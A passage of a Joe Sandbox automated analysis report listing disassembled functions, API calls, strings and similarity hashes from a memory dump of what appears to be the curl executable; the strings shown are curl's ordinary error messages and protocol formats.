                                • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 00863B83
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00863B8C
                                • ferror.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00863B96
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00863BA6
                                • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00863BAE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_func$_errnoferrorfreadstrerror
                                • String ID: 0Lu@Ru@/Mu$stdin: %s
                                • API String ID: 2463866935-3793109247
                                • Opcode ID: c2de943a2e8b74280a41a2f16196ec7d5de66de1614685adcdef9e91967669da
                                • Instruction ID: a2eac7e41eae56ec3ee18503f61ac720258a444f9c12feee538989a38d42b3df
                                • Opcode Fuzzy Hash: c2de943a2e8b74280a41a2f16196ec7d5de66de1614685adcdef9e91967669da
                                • Instruction Fuzzy Hash: 1F21FE32500B459FCB208F29DC8596AB7F9FF49771796092EF946C2A12DB70FE008B15
                                APIs
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A1AB
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A1B3
                                  • Part of subcall function 0087A01F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 0087A058
                                  • Part of subcall function 0087A01F: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 0087A06F
                                  • Part of subcall function 0087A01F: ___from_strstr_to_strchr.LIBCMT ref: 0087A087
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A1E9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A1F6
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A1FE
                                • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A209
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLast_errno$FormatMessage___from_strstr_to_strchrwcstombs
                                • String ID: 0Lu@Ru@/Mu$Unknown error %u (0x%08X)
                                • API String ID: 1622130791-4003156066
                                • Opcode ID: 0098d9f96c28f8d7525f233434112b20df6a00dafd8f35a845831c08e23ecb1d
                                • Instruction ID: 86ebbf016e13764e06578e1eeba2028b3fb93d287198444c56c840ca5d4a0a9d
                                • Opcode Fuzzy Hash: 0098d9f96c28f8d7525f233434112b20df6a00dafd8f35a845831c08e23ecb1d
                                • Instruction Fuzzy Hash: 67F08C31200A01EFC3156BADDC49B5EBBE8FF9A751F548166F506D7361EAB1CC008A62
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,00862BF3), ref: 00862A4D
                                Strings
                                • You don't have permission to create %s., xrefs: 00862A94
                                • The directory name %s is too long., xrefs: 00862A7F
                                • Cannot create directory %s because you exceeded your quota., xrefs: 00862A78
                                • Error creating directory %s., xrefs: 00862A71
                                • 0Lu@Ru@/Mu, xrefs: 00862A4D
                                • No space left on the file system that will contain the directory %s., xrefs: 00862A8D, 00862A9A
                                • %s resides on a read-only file system., xrefs: 00862A86
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno
                                • String ID: %s resides on a read-only file system.$0Lu@Ru@/Mu$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
                                • API String ID: 2918714741-3601382194
                                • Opcode ID: 5b01137789f9aeb694a1b378f1edc448c6592520943c61b56c05b6f489b8a94e
                                • Instruction ID: cee29397500d633feb9dbb8c86b3618d9c10919f6698efe09072aa001f323af0
                                • Opcode Fuzzy Hash: 5b01137789f9aeb694a1b378f1edc448c6592520943c61b56c05b6f489b8a94e
                                • Instruction Fuzzy Hash: 36F0E562A28E37EB433945FF660C4B61A44F7C239735A87E7F60ADA724D4C4CC0DA212
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 0086F58A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
                                • API String ID: 1294909896-2831394677
                                • Opcode ID: 96daa64bf266bcb41a6bf2f2c8cec01b40ab677092bf274ed576c4b96564eaf3
                                • Instruction ID: 69723a11fb12bc395425dc3b6197a32eb0fd9737f9faf09dca944bff99473c62
                                • Opcode Fuzzy Hash: 96daa64bf266bcb41a6bf2f2c8cec01b40ab677092bf274ed576c4b96564eaf3
                                • Instruction Fuzzy Hash: 146100726083459BCB108E24A881AAF7BE1FF89354F1A443CFA9AD7343D631DC04C792
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00874D69
                                • _strrchr.LIBCMT ref: 00874D7E
                                • ___from_strstr_to_strchr.LIBCMT ref: 00874D8E
                                • _strrchr.LIBCMT ref: 00874DE2
                                • ___from_strstr_to_strchr.LIBCMT ref: 00874E13
                                • ___from_strstr_to_strchr.LIBCMT ref: 00874E1F
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00869BEA,?,00000208,?,?,?,?,?,0086A827,?,?,00000000), ref: 00874E73
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00869BEA,?,00000208,?,?,?,?,?,0086A827,?,?,00000000), ref: 00874E8E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00869BEA,?,00000208,?,?), ref: 00874EE0
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
                                • String ID:
                                • API String ID: 3226260525-0
                                • Opcode ID: fbf73ca160373a494c77ef667a7c15425a25ad12d755bd872b476f8796f93985
                                • Instruction ID: 26793496e9830f60179ee2b6c3087f48b9d68f0c5fc2df499104800910b31af0
                                • Opcode Fuzzy Hash: fbf73ca160373a494c77ef667a7c15425a25ad12d755bd872b476f8796f93985
                                • Instruction Fuzzy Hash: 915127329083569FDB318F6888546BE7FE5FF16360F28907AD489DB28AEB70DC058751
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,HTTP,?,?), ref: 00894F12
                                • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000005C,?,?,00000000,HTTP,?,?), ref: 00894F25
                                • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000002F), ref: 00894F34
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00894F9C
                                • _mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,?,?), ref: 00894FAC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00894FC0
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00894FC9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00895000
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00895013
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_mbschr_strdup$_mbsnbcpymalloc
                                • String ID:
                                • API String ID: 103568399-0
                                • Opcode ID: fe3da8a9aa85674f4b05a3bc68641b0b26a3c8223e3f53ce947856b9efe9a38e
                                • Instruction ID: 5e9e00b697f172ecccc767f6faf1cfc88fffc64a115f0e6daa10b57e9a51bb3b
                                • Opcode Fuzzy Hash: fe3da8a9aa85674f4b05a3bc68641b0b26a3c8223e3f53ce947856b9efe9a38e
                                • Instruction Fuzzy Hash: 6331D532A05A06DFDB156F68EC58AAE7BF5FF89310B288169E405DB352DF70C9018B90
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A0503
                                • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 008A05B7
                                • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008A05C6
                                • _write.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 008A0673
                                • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008A06EE
                                Strings
                                • Can't open %s for writing, xrefs: 008A0565
                                • Can't get the size of %s, xrefs: 008A05CE
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _close$___from_strstr_to_strchr_fstat64_write
                                • String ID: Can't get the size of %s$Can't open %s for writing
                                • API String ID: 2085843339-3544860555
                                • Opcode ID: 857114524204a956077fa78f490ae91c5b9244ea786fbde860a8741f5d066fb5
                                • Instruction ID: 8ea6e30546940f7233e530ab090336e31ea30e15183822485d55b1c410795114
                                • Opcode Fuzzy Hash: 857114524204a956077fa78f490ae91c5b9244ea786fbde860a8741f5d066fb5
                                • Instruction Fuzzy Hash: 96618231E002088BEF18DFA8C895AAD77B1FF99314F284179EC09EB745EA709C418F51
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 008B1E77
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 008B1E7F
                                • _ValidateLocalCookies.LIBCMT ref: 008B1F08
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 008B1F33
                                • _ValidateLocalCookies.LIBCMT ref: 008B1F88
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm$csm
                                • API String ID: 1170836740-3733052814
                                • Opcode ID: ffe5344152b18b320c596f294f7c02f87a9ed725466f8209cc7d8052012d4613
                                • Instruction ID: e6f2e6a315438755bdb68eedc34631fafcd058858ac35a06ab1cc530cc91c0c3
                                • Opcode Fuzzy Hash: ffe5344152b18b320c596f294f7c02f87a9ed725466f8209cc7d8052012d4613
                                • Instruction Fuzzy Hash: 4351AF34A002089FCF24DF69C858AEEBBA1FF44314F548169E815DF3A2CB31E952CB91
                                Strings
                                • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 008865B9
                                • %s.%s.tmp, xrefs: 00886583
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%s.%s.tmp
                                • API String ID: 0-2507297550
                                • Opcode ID: fe8e35ab6811a0c9f99cc32147817c9bdc3f6361df5587562841432e9c94506b
                                • Instruction ID: 64f57891f76a9c08cda05de48b4cce8e737cfc17440de9bec997b1b0bfbcfe6d
                                • Opcode Fuzzy Hash: fe8e35ab6811a0c9f99cc32147817c9bdc3f6361df5587562841432e9c94506b
                                • Instruction Fuzzy Hash: 3F418F72E006199BDF11EF94D851AAEB7B5FF58760F24411AE801FB345FB70AD118BA0
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008813E6
                                • ___from_strstr_to_strchr.LIBCMT ref: 0088142F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088149A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008814DD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$___from_strstr_to_strchr
                                • String ID: %.*s$%sAuthorization: Digest %s$Proxy-
                                • API String ID: 622630536-541442569
                                • Opcode ID: 19a152d5a1e4891185e9412ba4c9a180a8f642bf826cb900900ef7f11fbd3756
                                • Instruction ID: d1769addd25ab95d13a6a11b2cdf884786ddb41519a3876886dc66462aa0f487
                                • Opcode Fuzzy Hash: 19a152d5a1e4891185e9412ba4c9a180a8f642bf826cb900900ef7f11fbd3756
                                • Instruction Fuzzy Hash: A0417C71E0421AAFDF04DFA8D844AAEBBF9FF48310F14406AE905E7352DB719D018BA5
                                APIs
                                • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,008B8C2C), ref: 0086505C
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00865070
                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,008B8C2C), ref: 00865097
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,008B8C2C), ref: 008650A2
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0086512B
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0086513C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdup$mallocstrcspnstrncpystrpbrk
                                • String ID: pkcs11:
                                • API String ID: 1722728043-2446828420
                                • Opcode ID: 40553cbd1b40514cda1c05805a73453f3f64032b342958a998375eb9143cd8b5
                                • Instruction ID: 00e7a7fcdcf038aef72bde2c3417c9a0327170953a51da1932e873f37bf9c17c
                                • Opcode Fuzzy Hash: 40553cbd1b40514cda1c05805a73453f3f64032b342958a998375eb9143cd8b5
                                • Instruction Fuzzy Hash: BB412470204A859FDB324F28D8A07AA7FE9FF47344F294099D4C5CB382D6B58D42C762
                                APIs
                                • htons.WS2_32(?), ref: 0089F47D
                                • htons.WS2_32(?), ref: 0089F491
                                • send.WS2_32(?,?,00000003,00000000), ref: 0089F51A
                                • WSAGetLastError.WS2_32(?,00000001), ref: 0089F524
                                • send.WS2_32(?,?,00000002,00000000), ref: 0089F55A
                                • WSAGetLastError.WS2_32(?,00000001), ref: 0089F564
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLasthtonssend
                                • String ID: Sending data failed (%d)
                                • API String ID: 2027122571-2319402659
                                • Opcode ID: f9d8bb83393b2ed1fe0ca3170e68d3fb27f47db107546ab6371bb3637c349cb1
                                • Instruction ID: a6d5ddb1faac682dee7c3492e0ac5a5178776f295949e078881fd97f7851a09a
                                • Opcode Fuzzy Hash: f9d8bb83393b2ed1fe0ca3170e68d3fb27f47db107546ab6371bb3637c349cb1
                                • Instruction Fuzzy Hash: 2D41CD70244154DFDB16AF28C8C5EA977F5FF25710F280AB9EAC5CB296D7309801CB65
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0086781F
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B7A20), ref: 00867833
                                • strtok.API-MS-WIN-CRT-STRING-L1-1-0(?,008B8E74), ref: 0086786E
                                • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,008B8E74), ref: 008678A2
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008678B7
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008678CA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: strtok$__acrt_iob_funcfclosefopenfree
                                • String ID: p
                                • API String ID: 896044852-2181537457
                                • Opcode ID: 6496dafd733f8cbd018795516c82724cc9c4bff8218625f255f599ec6207bff0
                                • Instruction ID: 4fa84f714208bdfe558d23943ede2c5ef2f58b6fc5f91b334ce99203b0411aa1
                                • Opcode Fuzzy Hash: 6496dafd733f8cbd018795516c82724cc9c4bff8218625f255f599ec6207bff0
                                • Instruction Fuzzy Hash: 6431BF7060C7429FD315CB388498A6A7BE5FB9A318F26492DF196C3381EB74DC05C755
                                APIs
                                • _strrchr.LIBCMT ref: 0089B2B9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 0089B2E3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?), ref: 0089B33A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?), ref: 0089B372
                                  • Part of subcall function 00872813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00872848
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strrchrmalloc
                                • String ID: %s%s%s$LIST$NLST
                                • API String ID: 685622329-959297966
                                • Opcode ID: 1f7184bb441d9b76d557400cf912dd15265d6f80c7068a74197cfe6071c5030f
                                • Instruction ID: 19042e896bda24caa101784c4a5bd896355458e66c7fba5bedad18a71b3db053
                                • Opcode Fuzzy Hash: 1f7184bb441d9b76d557400cf912dd15265d6f80c7068a74197cfe6071c5030f
                                • Instruction Fuzzy Hash: 7731D572700615ABEF04ABA8AD81BAE77E9FF44754F18807EE905D7341D7709D008791
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0088EBB8,?), ref: 00888BBF
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,0088EBB8,?,?), ref: 00888C96
                                  • Part of subcall function 008888E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00888C01,?,?,00000000), ref: 00888928
                                  • Part of subcall function 008888E1: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,00888C01,?,?,00000000), ref: 00888936
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,0088EBB8,?,?,?,?), ref: 00888C19
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,0088EBB8,?,?,?,?), ref: 00888C2E
                                • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00888A20,00000010,00000000,00000000,?,?,?,?,?,?,?,?,?,0088EBB8), ref: 00888C63
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$CriticalInitializeSection_beginthreadex_errnocallocmalloc
                                • String ID: 0Lu@Ru@/Mu
                                • API String ID: 1055258384-1923536700
                                • Opcode ID: ccf925bb506d42c4338a607da07970d5526062b2adb40798326bb839c9c868c4
                                • Instruction ID: d47bed66ce16c043923032928a1c2b3eadf61b455cc1e8106bf683c327f349ef
                                • Opcode Fuzzy Hash: ccf925bb506d42c4338a607da07970d5526062b2adb40798326bb839c9c868c4
                                • Instruction Fuzzy Hash: 8D31B071A01A15DFDB18AF68EC44A5E7BF5FF49310B10416EE806D3391DB70A9008B95
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strrchr$free
                                • String ID: %s%s$%s/%s$://
                                • API String ID: 3904173637-3147304931
                                • Opcode ID: 27250ddeb69e73daf9f0c295d7c1c797c1901eb7a4ee03b270631a4bab5976e3
                                • Instruction ID: 018c58e6fdf60f8a76f74b1821c87fcc1524bb8709ff8b39572e7dc6344fdae9
                                • Opcode Fuzzy Hash: 27250ddeb69e73daf9f0c295d7c1c797c1901eb7a4ee03b270631a4bab5976e3
                                • Instruction Fuzzy Hash: AB213A33F04715ABDF2466B85C55A6EB6E4FB45750F160079ED04EB382EE61CD028292
                                APIs
                                • getpeername.WS2_32(?,?,?), ref: 0087E4E6
                                • WSAGetLastError.WS2_32 ref: 0087E4F0
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A0C3
